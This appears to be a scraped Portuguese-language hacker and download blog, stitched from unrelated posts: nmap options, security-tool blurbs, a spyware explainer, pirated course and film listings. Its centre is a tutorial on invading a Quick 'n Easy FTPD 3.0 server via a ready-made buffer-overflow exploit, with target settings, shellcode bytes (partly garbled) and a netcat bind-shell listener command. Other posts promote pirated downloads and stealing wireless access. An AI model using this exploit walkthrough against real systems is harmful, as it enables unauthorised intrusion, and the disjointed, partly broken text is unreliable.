- -sT – Com esse parâmetro é feito um escaneamento através de tentativas de conexão TCP. Essa forma é muito fácil de ser identificada por firewalls e IDS;
- -sS – Assim a tentativa será com pacotes TCP com a flag SYN ligada, ou seja, como apenas uma requisição de conexão. Essa técnica dificulta um pouco a detecção;
- -sP – Com essa opção o escaneamento será feito através de pacotes ICMP echo request. Verifica apenas se o host está ativo;
- -sU – Envia pacotes UDP com 0 byte para determinar o estado dessas portas;
- -sO – É usado para tentar determinar os protocolos suportados pelo host;
- -O – Com esse parâmetro é feito uma tentativa de determinar o sistema operacional através de uma técnica conhecida como Active FingerPrint.
- -A – Verifica a porta e o serviço que está rodando.
------------=======-----------
------=======------
KLdetector13
------====------
----=====---
O programa não exige configurações avançadas ou longos downloads. Basta executá-lo para reforçar as proteções de seu computador.
O diferencial do ThreatFire Free Edition é que ele não utiliza somente signatures, ou seja, listas de vírus, para detectar arquivos perigosos em sua máquina. Ele faz uma análise comportamental para detectar e parar qualquer atividade suspeita que possa comprometer sua segurança.
O ThreatFire Free Edition possui todas as características básicas de um antivírus. Ele remove os arquivos nocivos ou, quando isso não é possível, deixa-os em quarentena, impedido que eles sejam acessados e executados. Este protetor também conta com um scanner para rootkits e outros arquivos que se escondem nas profundezas de seu computador.
Este protetor não pode ser considerado como um antivírus completo, mas é um bom complemento para um programa que você já usa e confia. Ele permite que você personalize as regras para detecção de arquivos nocivos. Isto pode reforçar o seu antivírus padrão na hora de proteger seu computador.
O ThreatFire Free Edition é leve. Mesmo que ele seja executado durante todo tempo e monitore todas as suas atividades, ele requer pouca memória RAM.
No entanto, não dá para esquecer que existem pessoas mal-intencionadas em todos os lugares, incluindo na Internet obviamente. É só parar para refletir: em um mundo amplo onde é possível se expressar abertamente e de forma anônima, é como um convite aberto para as ameaças. E qualquer um está exposto ao perigo, principalmente crianças e adolescentes.
Pensando nisso, a Corvineum criou um pequeno aplicativo que vai agradar bastante tanto os pais preocupados com a segurança dos filhos, quanto aqueles que gostam de manter o controle do tipo de informação acessada.
Livre-se de conteúdos indevidos...
O ProCon Latte é uma expansão para o Mozilla Firefox que tem a incrivelmente útil função de filtrar qualquer conteúdo de qualquer página da Internet, baseando-se nas palavras do texto presente no site.
... Ou mande sites para a lista branca
Você pode barrar o acesso a páginas inapropriadas — sejam elas sobre pornografia, jogos de azar, crimes cibernéticos — ou bloquear todo o tráfego de informações e liberar o acesso somente determinados sites. Para isso, você adiciona os links na lista branca. Assim, só podem ser acessados os sites selecionados por você.
Características gerais
O aplicativo não só é pequeno como discreto. Ao contrário da grande maioria das expansões, o ProCon Latter não instala uma barra de tarefas no navegador, mas mostra um ícone no canto inferior direito do Mozilla. Invisível, ou quase. Há a opção de retirar a exibição da barra de status e do menu “Ferramentas”.
As configurações são altamente personalizáveis e abertas para você escolher os filtros conforme sua necessidade. Outra característica interessante é que você pode acrescentar uma senha para garantir que ninguém mude as opções de configuração feitas.
O que é um spyware e qual o "estrago" causado
Os spywares são programas de computador cujo objetivo é recolher informações a respeito de um usuário e seu comportamento com relação à internet de forma automática e sem o seu conhecimento nem consentimento. Esse monitoramento serve para verificar o conteúdo de sua navegação de forma a criar um perfil que será repassado a alguma entidade para finalidades variadas.
São diferentes dos trojans porque seu objetivo não é “tomar” o sistema do computador, mas sim apenas o monitoramento dos hábitos do usuário. Existem inclusive spywares desenvolvidos por companhias para vender perfis de usuário formados por meio deles. Elas costumam produzir inúmeras variantes de seus spywares, modificando e melhorando-os não serem detectados e tornarem-se de difícil remoção.
Alguns dos vírus disponíveis carregam consigo spywares, cujo objetivo é roubar dados confidenciais de usuários. Assim é possível capturar logins bancários, montar e enviam logs das atividades do usuário, ou ter acesso a determinados arquivos ou documentos pessoais e confidenciais.
Como o programa funciona
Este programa é uma ferramenta para eliminar mal-intencionados, removendo de seu computador spybots, keyloggers e adwares. Entre as opções do programa, estão disponíveis ferramentas para backup, atualizações (o programa é atualizado constantemente no servidor, e é sempre recomendável mantê-lo rigorosamente em dia) e imunização (que se trata de um processo preventivo para seu navegador, bloqueando alguns tipos de entradas).
Após rastrear seu computador, o programa exibe os resultados de duas formas: aqueles na cor vermelha são spywares, que podem ser ameaças reais ao seu sistema. Resultados na cor verde são rastreadores de uso (que armazenam informações de navegação temporariamente em seu sistema apenas) são inofensivos e excluí-los fica a seu critério, servindo apenas para excluir rastros de navegação interna em seu computador.
Esse procedimento pode ser recomendado para quem compartilha o computador e deseja que esses dados sejam apagados de seus históricos internos de navegação. Recomenda-se sempre cautela na hora de excluir spywares, pois muitas vezes os arquivos hospedeiros podem ser danificados ou até mesmo perdidos completamente.
Um Firewall a sério ( olha ñ basta voce baixar um firewall no brechacker.blogspot.com e instalar em seu pc e sair gritando q TOU SEGURO.....é necessario q vc crie regras de filtragem q vão de acordo com suas necessidades ou seja que protejam seu pc até o nivel q vc deseja "nehum proteje até ao nivel desejado" .Esta versão do famoso e conhecido zone alarm tras melhorias espantosas baixe esperimente e nãos e arrependa.Se vc tiver dificuldades em criar regras de filtragens me contacte se eu estiver disponivel entao levaremos bonx minutos configurando sua nova parede de fogo
--------------------------------------------------------------------------------
Por Twi John
Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesa técnica para invadir Telnet, SSH entre outros.
A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.
Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.
Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar:
nmap -v -sV -sC -O host
Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo.
Veja o sistema operaciona.
Feito isso agora vamos usar o exploit em python.
http://www.securiteam.com/exploits/5WP0C2AJ5W.html
Aqui você deve configurar ele:
host = "127.0.0.1" // O Host que será explorado
port = 21 // A porta , por padrão 21
user = "h07" // O usuario, caso tenha acesso anonimo coloque "ftp"
password = "open" // Mesma coisa do usuario
Shellcode: No caso desse exploit será aberto a calculadora do windows, mais você pode estar alterando ele, pode encontrar shellcodes no site do metasploit ou então fazendo você mesmo.
http://www.metasploit.com/shellcode
shellcode = (
#bad chars: 0x00 0x0a 0x0d 0x5c 0x2f
#reconstruction PEB block
#mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer
#mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value
#...
"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\ x53\ xB9"
"\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)
"\xFF\xD1\xEB\xF7")
Pronto, agora ele irá enviar "A" 267, para ocorrer o buffer overflow colocando a shellcode.
Caso você tenha escolhido uma shellcode de bind, antes de explorar você abre o netcat e digita : nc -vv -l -p (porta de bind) -n
Agora usa o exploit e você estará conectado na shell do sistema.
Obrigado, espero que tenham gostado. Me corrijam qualquer coisa.
Rastreando sua namorada, amiga mãe e etc..
Internet rapida >>>>>>>>>
voce faz download a velocidades inaceitaveis,
Voce é obrigado a esperar dias para finalizar o dowload do seu filminho
Voce deve esperar horas para baixar o novo album do seu cantor favorito
Problema minimizado porque com este software seus downloads vão estar acelerados e muito (eu baixava a 700kbs agora os meus download chegam aatingir uma vekocidade de 1500kbs ! Baixe e esperimente.Testei no Windows 7 ultimate,provavelmente roda sem problema em Xp e vista .
» Sinopse
Armados e equipados com o que há de mais moderno no mundo da espionagem, o esquadrão Força-G faz parte de um programa secreto do governo norte-americano. Altamente especializados em enfrentar as mais difíceis missões, eles são muito mais do que agentes comuns, eles são porquinhos-da-índia super treinados, que precisam fazer de tudo para evitar que um excêntrico bilionário siga a sua missão de dominar o mundo. O esquadrão de elite do governo liderado pelo corajoso Darwin é formado pelo perito em armas Blaster e a sexy Juarez, treinada em artes marciais. Além dos três porquinhos, o grupo também tem a presença da mosca Mooch, que faz todo o reconhecimento dos espaços para o grupo, e a toupeira Speckles, especialista em computação. Juntos, esses animais vão mostrar que podem muito mais do que os simples humanos no mundo da espionagem. Mesclando computação gráfica e cenas reais, “Força-G” é a primeira experiência do produtor Jerry Bruckheimer, de “Piratas do Caribe”, em 3D. A direção é do especialista em efeitos visuais Hoyt Yeatman, vencedor do Oscar na categoria por “O Segredo do Abismo”.
» Informações e Servidores.
Continue reading »
» Sinopse
O único curso da web de web 2.0
Aprenda neste curso de web2.0 a dominar os padrões web w3, utilizando passo a passo:
Css avançado 100% validado, xhtml 100% validado, Web standard, acessibilidade, usabilidade, e 100% tableless.
Vai aprender a criar um template passo a passo com a estrutura xhtml em tableless. 100% validado pela w3 .
Nº de páginas: Video aula
Tamanho: 282Mb
Formato: Iso
Com este curso você será capaz de montar sua rede sem fio em três horas! Para que se enrolar com os cabos, se da para viver sem eles?
Esse curso feito pela Revista Info Exame explica em video aulas interativas feitas em flash e pequenos videos, como montar uma rede sem fio de baixo custo.
O arquivo de imagem é no formato .nrg, então você deve utilizar o nero para gravar a mídia ou DAEMON Tools que na nossa opinião é uma das maneira simples e muito eficiente de emular unidades de CD e DVD.
Sinopse.
Aulas:
1 – Conhecendo a Interface do Excel
2 – Copiar e Somar
3 – Formatar e Seqüências
4 – Formatar Colunas e Desfazer
5 – Riscos no uso do Cortar, Eliminar e Inserir
6 – Congelar Painéis e Cálculod e Porcentagem
7 – Fixar Células em Fórmulas
8 – Trabalhando com Planilhas (parte 1)
9 – Trabalhando com Planilhas (parte 2)
10 – Classificar e Agrupar Linhas e Colunas
11 – Autofiltro e Substituir
12 – Comentário e Impressão
13 – Autoformatar e Teclas de Atalho
14 – Cálculo Manual, Arredondamento e Atingir Meta
15 – Proteger Células e Planilhas
16 – Procura Vertical – Proc V
17 – Arredondamento e Listas
18 – Formatação Condicional
19 – Conte Se e Soma Se
20 – Função Condicional
21 – Gráficos
22 – Funções de Banco de Dados
23 – Tabelas Dinâmicas
24 – Formulários
25 – Macros Básicas
Informações.
Tamanho: 502 MB/ 6,16Gb Descompactado
Formato: Rar
Idioma: Português
Download.
MEGAUPLOAD / 2SHARED
Curso de desenvolvimento web para o Dreamweaver 8 e CS3, criando páginas e sistemas em AJAX / PHP / MySQL, trabalhando com as extensões MX Kollection e MX Ajax Toolbox, aonde será criado diversos sistemas e sites com a administração on-line usando todas as ferramentas avançadas disponíveis. Sistema de notícias, galeria de fotos, upload e download de qualquer tipo de arquivo, sistema administrativo de usuários, sistema de produtos, blog, etc. Todos os sistemas citados tem como padrão uma área administrativa.
Curso Avançado Dreamweaver Volume 3 e 3.1 ( 2 volumes em uma pasta)
Curso Avançado Dreamweaver Volume 4
Curso Avançado Dreamweaver Volume 4.1
Curso Avançado Dreamweaver Volume 4.2
Curso Avançado Dreamweaver Volume 5
Gênero: Curso
Ano de Lançamento: 2008
Editora: Jahio
Nº de páginas:
Tamanho: 3.8GB
Formato: Rar
Idioma: Português
Conheça e aprenda a usar o Windows7.
35 videoaulas com todas as novidades.
Veja como funciona: área de trabalho,
Internet Explorer 8, Windows Explorer,
Media Player 12, Visualizador de imagens
e muito mais.
Tamanho: 124 MB
Formato: swf e pdf
Idioma: Português
Descrição:
* Curso De hacker:
+ Com 10 Modulos
+ Sao 20 Cds com video aulas e 80 liçoes adicionais
+ Se impresso sao mais de 1600 paginas com material Exclusivo
* Prof. Marco Aurélio Thompson
+ Presidente da ABSI – Associação Brasileira de Segurança na Internet
+ Consultor Sebrae
+ Escritor
Tamanho total: 7,76 Gb
10 modulos, cada um sobre um assunto
numero de midias: 17 cds
formato: rar, iso, avi
==============================================================
Minha opiniao:
Este curso é completissimo! tem de tudo, começa da estaca zero e vai evoluindo a niveis mais avançados sem agente perceber. Curso todo em video aulas incluindo material de apoio como apostilas e programas usados nos videos.
Baixe todos os modulos e poste nos comentarios se este nao é o melhor conteudo hacker da net.
Parte que eu mais gostei foi como entrar em redes wireless e tendo net de graça no notebook. (somente pra testar, nao estou usando) Muito bom mesmo.
Obs: O curso so saiu em 17 cds e nao em 20 como é dito na apresentação
Dica: Eu nao emulei nem gravei nenhum cd, apenas cliquei em descompactar a propia imagem iso e depois cliquei no executavel.
Tamanho: 400 KB
Formato: Rar
Idioma: Português
Servidores: Easy-Share
Estilo: Hacker
Tamanho: 1 MB
Formato: Rar
Idioma: Português